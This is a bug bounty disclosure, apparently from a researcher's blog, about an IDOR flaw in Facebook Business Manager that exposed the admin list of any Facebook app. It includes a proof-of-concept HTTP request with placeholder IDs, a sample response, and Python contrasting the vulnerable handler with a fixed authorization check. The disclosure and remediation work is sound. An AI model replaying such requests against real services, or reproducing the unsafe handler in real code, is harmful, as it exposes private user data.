Posted on February 2, 2020

Disclose Full Admin List of any Facebook Applications

In Facebook Business Manager, there is an endpoint that fetches the admin list for pages, apps and other asset types. The call was properly secured for Facebook Pages, but it was vulnerable for the asset type apps.

An IDOR (Insecure Direct Object Reference) vulnerability allowed fetching the admin list of any Facebook Application, regardless of whether the app was assigned to the Business Manager account; access to the endpoint for apps was unrestricted.

Proof of concept

Request:
POST /business/aymc_assets/admins/ HTTP/1.1
Host: business.facebook.com

asset_ids[0]=TARGET_APP_ID
business_id=ATTACKER_BUSINESS_ID

Response:
{"__ar": 1, "payload": {
    "assetAdmins": {
      "__imm": {
        "method": "Map",
        "value": [
          ["123456789",
            {"name": "fname lname",
              "id": "123456789",
              "iconURI": "/images/assets_DO_NOT_HARDCODE/facebook_icons/badge-admin_outline_20_fds-black.png",
              "isSelected": true,
              "isSelectionDisabled": false,
              "secondaryInfo": "FACEBOOK APP NAME"
            }],
          ["123456789xxN",
            {"name": "Admin N",
              "id": "123456789xxN",
              "iconURI": "/images/assets_DO_NOT_HARDCODE/facebook_icons/badge-admin_outline_20_fds-black.png",
              "isSelected": true,
              "isSelectionDisabled": false,
              "secondaryInfo": "FACEBOOK APP NAME"
            }]]}}}}

Impact

This could have let a malicious user disclose the admin/developer list of any Facebook Application.
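The missing check the report describes, modelled as an added example; this is not Facebook code and the data store, business and asset identifiers are constructed placeholders. The unsafe handler trusts the supplied asset id (the IDOR pattern behind the PoC above), while the fixed handler verifies that each requested asset is actually assigned to the caller's business, for every asset type, before returning anything:

```python
"""Constructed model of the business-to-asset authorization check that was missing.

Hypothetical data only; nothing here is Facebook's implementation. Two
handlers share one store: the unsafe one returns admins for any asset id,
the fixed one first verifies the asset belongs to the caller's business.
"""
from dataclasses import dataclass, field


class Forbidden(Exception):
    """Raised when the caller may not see the requested admin list."""


@dataclass
class Business:
    business_id: str
    members: set = field(default_factory=set)   # users allowed to act for it
    assets: dict = field(default_factory=dict)  # asset_type -> set(asset_id)


# Constructed sample data with placeholder identifiers (not real ids).
ASSET_ADMINS = {
    ("app", "APP_OWNED"): ["Admin A", "Admin B"],
    ("app", "APP_FOREIGN"): ["Someone Else"],   # belongs to another business
    ("page", "PAGE_OWNED"): ["Page Admin"],
}

BUSINESSES = {
    "BIZ_1": Business(
        "BIZ_1",
        members={"alice"},
        assets={"app": {"APP_OWNED"}, "page": {"PAGE_OWNED"}},
    ),
}


def admins_unsafe(requester, business_id, asset_type, asset_ids):
    """IDOR pattern: only the business membership is checked; the asset ids
    are trusted as supplied, so any app id leaks its admin list."""
    biz = BUSINESSES[business_id]
    if requester not in biz.members:
        raise Forbidden("not a member of this business")
    return {a: ASSET_ADMINS.get((asset_type, a), []) for a in asset_ids}


def admins_checked(requester, business_id, asset_type, asset_ids):
    """Fixed: authorize the (business, asset) relation for every id in the
    batch before returning anything, so one bad id fails the whole request."""
    biz = BUSINESSES[business_id]
    if requester not in biz.members:
        raise Forbidden("not a member of this business")
    owned = biz.assets.get(asset_type, set())
    unauthorized = [a for a in asset_ids if a not in owned]
    if unauthorized:
        raise Forbidden(f"{asset_type} {unauthorized} not assigned to {business_id}")
    return {a: ASSET_ADMINS.get((asset_type, a), []) for a in asset_ids}


def probe(handler, business_id, asset_type, asset_ids, requester="alice"):
    """Return the handler's result, or None when it refuses the request."""
    try:
        return handler(requester, business_id, asset_type, asset_ids)
    except Forbidden:
        return None


if __name__ == "__main__":
    # A business member asking for an app that is not assigned to their business.
    print(probe(admins_unsafe, "BIZ_1", "app", ["APP_FOREIGN"]))   # leaks
    print(probe(admins_checked, "BIZ_1", "app", ["APP_FOREIGN"]))  # None
```

The fixed handler fails closed on a batch: because the request carries an `asset_ids[]` array, checking only the first element or returning partial results would leave the same gap, so every id is authorized before any admin list is built.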

Timeline

  • 25 Dec, 2018 – Report Sent.
  • 04 Jan, 2019 – Escalation by Facebook.
  • 08 Jan, 2019 – Fixed by Facebook.
  • 27 Mar, 2019 – Bounty Awarded by Facebook.